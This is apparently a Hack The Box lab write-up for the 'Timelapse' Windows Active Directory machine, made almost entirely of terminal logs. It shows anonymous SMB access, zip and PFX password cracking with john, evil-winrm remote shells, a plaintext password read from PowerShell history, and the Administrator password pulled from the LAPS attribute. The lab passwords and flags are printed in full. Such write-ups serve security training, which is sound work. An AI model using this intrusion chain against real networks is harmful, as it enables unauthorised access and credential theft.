HTB Timelapse done
Timelapse
OS:
Windows AD
Technology:
SMB
IP Address:
10.10.11.152
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-15 10:07:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Users and pass:
Password for file: legacyy_dev_auth.pfx
P: thuglegacy
---
From commandline history: powershell
L: svc_deploy
P: E3R$Q62^12p7PLlC%KWaxuaV
---
Read from ms-mcs-admpwd:
L: Administrator
P: .+6wL0M91gP5x%(8-4]j,g3i
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.152_nmap 10.10.11.152 ; cat 10.10.11.152_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 02:04 UTC
Nmap scan report for 10.10.11.152
Host is up (0.039s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-15 10:07:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_ssl-date: 2024-08-15T10:09:02+00:00; +8h00m08s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ cat /etc/hosts | grep time
10.10.11.152 dc01.timelapse.htb
Get zip file from SMB
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ smbclient -L //10.10.11.152 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ smbclient -N -L //10.10.11.152
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ smbclient -N //10.10.11.152/Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 15:39:15 2021
.. D 0 Mon Oct 25 15:39:15 2021
Dev D 0 Mon Oct 25 19:40:06 2021
HelpDesk D 0 Mon Oct 25 15:48:42 2021
6367231 blocks of size 4096. 1337935 blocks available
smb: \> cd Dev\
smb: \Dev\> dir
. D 0 Mon Oct 25 19:40:06 2021
.. D 0 Mon Oct 25 19:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021
6367231 blocks of size 4096. 1337935 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (11.5 KiloBytes/sec) (average 11.5 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> dir
. D 0 Mon Oct 25 15:39:15 2021
.. D 0 Mon Oct 25 15:39:15 2021
Dev D 0 Mon Oct 25 19:40:06 2021
HelpDesk D 0 Mon Oct 25 15:48:42 2021
6367231 blocks of size 4096. 1337871 blocks available
smb: \> cd HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 15:48:42 2021
.. D 0 Mon Oct 25 15:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021
6367231 blocks of size 4096. 1332808 blocks available
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (947.1 KiloBytes/sec) (average 796.6 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (478.8 KiloBytes/sec) (average 754.0 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (2074.0 KiloBytes/sec) (average 965.0 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (184.4 KiloBytes/sec) (average 832.8 KiloBytes/sec)
smb: \HelpDesk\> exit
Cracking password for file: winrm_backup.zip
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ zip2john winrm_backup.zip > winrm_backup.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ john winrm_backup.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2024-08-15 02:46) 2.857g/s 9912Kp/s 9912Kc/s 9912KC/s surken201..suppamart
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$
Unzip zip file: winrm_backup.zip
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ ls
10.10.11.152_nmap.gnmap 10.10.11.152_nmap.nmap 10.10.11.152_nmap.xml LAPS_Datasheet.docx LAPS_OperationsGuide.docx LAPS_TechnicalSpecification.docx LAPS.x64.msi legacyy_dev_auth.pfx winrm_backup.hash winrm_backup.zip
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ file legacyy_dev_auth.pfx
legacyy_dev_auth.pfx: data
Convert PFX to PEM
Cracking password to file PFX
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ john legacyy_dev_auth.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:33 DONE (2024-08-17 00:09) 0.01069g/s 34566p/s 34566c/s 34566C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Convert pfx to key.pem and cert.pem
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth_key.pem -nodes
Enter Import Password:
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out legacyy_dev_auth_cert.pem
Enter Import Password:
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ ls -l *.pem
-rw------- 1 kali kali 1232 Aug 18 00:39 legacyy_dev_auth_cert.pem
-rw------- 1 kali kali 1952 Aug 18 00:38 legacyy_dev_auth_key.pem
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
Privilege Escalation
Login as user: legacyy
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ evil-winrm -i 10.10.11.152 -c legacyy_dev_auth_cert.pem -k legacyy_dev_auth_key.pem -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
Read flag: user.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/18/2024 1:08 AM 34 user.txt
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
6faa06e4264ef794a9fe2343a99d57db
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::172
IPv6 Address. . . . . . . . . . . : dead:beef::e144:82a7:62e3:cc35
Link-local IPv6 Address . . . . . : fe80::e144:82a7:62e3:cc35%13
IPv4 Address. . . . . . . . . . . : 10.10.11.152
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%13
10.10.10.2
*Evil-WinRM* PS C:\Users\legacyy\Desktop>
Read command line history (powershell)
I found login and password for service: svc_deploy
svc_deploy
E3R$Q62^12p7PLlC%KWaxuaV
---
*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
Login as user: svc_deploy
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Find group: :LAPS_Reader
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Find password for user: Administrator
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer dc01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : .+6wL0M91gP5x%(8-4]j,g3i
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
Login as user: Administrator
L: Administrator
P: .+6wL0M91gP5x%(8-4]j,g3i
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ evil-winrm -i 10.10.11.152 -u administrator -p '.+6wL0M91gP5x%(8-4]j,g3i' -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/18/2024 2:38 AM 34 root.txt
*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
fb399a0d9c0b8abf9fba078660b7ee25
*Evil-WinRM* PS C:\Users\TRX\Desktop>
*Evil-WinRM* PS C:\Users\TRX\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
======================= ===========================================
timelapse\administrator S-1-5-21-671920749-559770252-3318990721-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================ ================ =========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Group Policy Creator Owners Group S-1-5-21-671920749-559770252-3318990721-520 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Domain Admins Group S-1-5-21-671920749-559770252-3318990721-512 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Enterprise Admins Group S-1-5-21-671920749-559770252-3318990721-519 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Schema Admins Group S-1-5-21-671920749-559770252-3318990721-518 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Denied RODC Password Replication Group Alias S-1-5-21-671920749-559770252-3318990721-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\TRX\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1c4
IPv6 Address. . . . . . . . . . . : dead:beef::a45a:9993:13aa:4d2
Link-local IPv6 Address . . . . . : fe80::a45a:9993:13aa:4d2%13
IPv4 Address. . . . . . . . . . . : 10.10.11.152
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%13
10.10.10.2
*Evil-WinRM* PS C:\Users\TRX\Desktop>
References
https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/laps
Lessons Learned